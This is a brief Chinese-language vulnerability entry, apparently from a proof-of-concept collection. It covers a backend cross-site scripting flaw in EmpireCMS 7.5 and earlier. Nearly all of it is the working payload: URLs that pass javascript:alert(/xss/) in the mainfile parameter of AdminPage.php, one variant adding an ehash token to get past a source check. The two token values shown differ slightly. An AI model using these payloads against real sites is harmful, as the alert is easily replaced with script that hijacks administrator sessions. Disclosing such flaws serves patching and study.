EmpireCMS V7.5后台xss漏洞
漏洞范围¶
EmpireCMS <=7.5
漏洞POC¶
需要有后台权限
http://********/e/admin/openpage/AdminPage.php?mainfile=javascript:alert(/xss/)
若提示非法来源加入参数hash参数,例:ehash_gxCQz=zERR2KY6NAMicC0c5OYv,如下
http://********/e/admin/openpage/AdminPage.php?mainfile=javascript:alert(/xss/)&ehash_gxCQz=zERR2KY6NAMicC50Yv